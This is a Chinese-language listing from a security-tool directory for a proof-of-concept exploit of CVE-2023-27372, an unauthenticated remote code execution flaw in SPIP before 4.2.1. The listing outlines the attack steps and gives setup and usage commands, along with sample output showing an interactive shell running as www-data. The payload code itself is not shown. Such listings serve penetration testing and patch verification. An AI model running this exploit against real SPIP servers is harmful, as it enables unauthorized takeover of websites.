Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-27372-SPIP-4.2.1-Unauthenticated-RCE-PoC — 针对 SPIP < 4.2.1 版本中密码重置表单的 PHP 对象注入漏洞,实现未经认证的远程代码执行的概念验证利用程序。提供交互式 shell 并处理 CSRF 令牌。 | Kitploit
工具/GitHubGitHub/estebanzarate/cve-2023-27372-spip-4.2.1-unauthenticated-rce-poc
漏洞分析代码分析漏洞利用Web应用程序漏洞利用渗透测试Payload 开发
GitHubestebanzarate/cve-2023-27372-spip-4.2.1-unauthenticated-rce-poc

CVE-2023-27372-SPIP-4.2.1-Unauthenticated-RCE-PoC

针对 SPIP < 4.2.1 版本中密码重置表单的 PHP 对象注入漏洞,实现未经认证的远程代码执行的概念验证利用程序。提供交互式 shell 并处理 CSRF 令牌。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
116个月前尚未审核
分享

CVE-2023-27372 — SPIP < 4.2.1 未认证远程代码执行 (PoC)

SPIP 4.2.1 之前的版本存在未认证的远程代码执行漏洞。密码重置表单中的 oubli 参数因反序列化处理不当,导致 PHP 对象注入。精心构造的序列化负载以 Web 用户身份在服务端执行,其输出会反映在响应中 oubli 输入字段的值内。


工作原理

  1. 从 /spip.php?page=spip_pass 获取反 CSRF 令牌。
  2. 发送包含 PHP 序列化负载的 POST 请求,注入到 oubli 参数中。
  3. 从响应中已反射的 value 属性中提取命令输出。
  4. 循环执行交互式命令,每次请求都刷新 CSRF 令牌。

依赖要求

  • Python 3
  • 安装依赖:
root@kitploit:~
python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests beautifulsoup4 prompt_toolkit

使用方法

root@kitploit:~
python3 exploit.py -u http://TARGET/spip

示例:

root@kitploit:~
$ python3 exploit.py -u http://10.10.10.10/spip
[*] 正在获取反 CSRF 令牌...
[*] 正在测试命令执行...
[+] 目标存在漏洞!输出: uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Shell 已打开。输入 'exit' 或按 Ctrl+C 退出。

Shell> whoami
www-data

参考链接

  • CVE-2023-27372
  • nuts7 的原始 PoC
  • SPIP 发布说明

致谢

  • 发现与原始漏洞利用: nuts7
  • 代码清理与交互式 Shell: Esteban Zárate
下载工具